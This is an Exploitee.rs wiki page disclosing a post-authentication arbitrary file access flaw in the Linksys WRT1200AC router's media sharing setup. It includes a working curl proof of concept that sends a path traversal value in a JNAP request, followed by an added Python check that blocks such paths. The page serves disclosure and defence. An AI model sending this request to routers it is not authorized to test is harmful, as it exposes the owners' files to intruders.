Linksys WRT1200AC

From Exploitee.rs
Revision as of 23:59, 3 August 2017 by 0x00string

"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."

Linksys WRT1200AC

Built on the foundation of our original WRT's open-source heritage, the Linksys WRT1200AC delivers superior network performance for the most demanding users. The WRT1200AC features two external antennas, a powerful 1.3GHz dual-core ARM, and Wireless-AC to provide high-speed Wi-Fi connections with exceptional range.

Post Authentication Arbitrary File Access

Arbitrary file access due to improper sanitization of the path field in the media sharing setup.

POC

Firmware Version: 1.0.5.177401


The following curl command is a Proof of Concept which demonstrates creating a file share at /.

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json; charset=UTF-8' -H 'X-JNAP-Action: http://linksys.com/jnap/storage/CreateFTPFolder' \
-H 'Expires: Fri, 10 Oct 2013 14:19:41 GMT' -H 'X-JNAP-Authorization: Basic <BASE64 CREDS>' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/ui/1.0.99.177401/dynamic/home.html' \
-b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' \
--data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' \
'http://192.168.1.1/JNAP/'
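
The missing server-side check on the path field, as an added example that is not from the original page or from the Linksys firmware: it resolves the requested share path under the partition's mount point and rejects anything that lands outside it. The mount table (/dev/sda1 mounted at /tmp/sda1) and all function names are assumptions made for illustration.

```python
import json
import os

# Assumption: each storage partition is mounted under a directory like this;
# the real mount layout of the device is not given on the page.
MOUNT_ROOTS = {"/dev/sda1": "/tmp/sda1"}


class UnsafePath(ValueError):
    """Raised when a share path would leave its partition's mount point."""


def resolve_share_path(partition_name, requested_path):
    """Return the absolute share directory, or raise UnsafePath."""
    if partition_name not in MOUNT_ROOTS:
        raise UnsafePath(f"unknown partition: {partition_name!r}")
    if "\x00" in requested_path:
        raise UnsafePath("NUL byte in path")
    root = os.path.realpath(MOUNT_ROOTS[partition_name])
    # Treat the client-supplied path as relative to the mount point, then
    # canonicalize: realpath collapses "." and ".." and follows symlinks,
    # so a symlink on the USB drive cannot be used to step outside either.
    candidate = os.path.realpath(os.path.join(root, requested_path.lstrip("/")))
    # Compare on a path-component boundary so /tmp/sda10 does not pass as
    # being inside /tmp/sda1.
    if candidate != root and not candidate.startswith(root + os.sep):
        raise UnsafePath(f"path escapes {root}: {requested_path!r}")
    return candidate


def validate_create_folder(body):
    """Validate a CreateFTPFolder JSON body and return the resolved directory."""
    req = json.loads(body)
    return resolve_share_path(req["partitionName"], req["path"])
```

The check runs on the canonicalized result rather than on the raw string, so it does not depend on filtering "../" sequences out of the input.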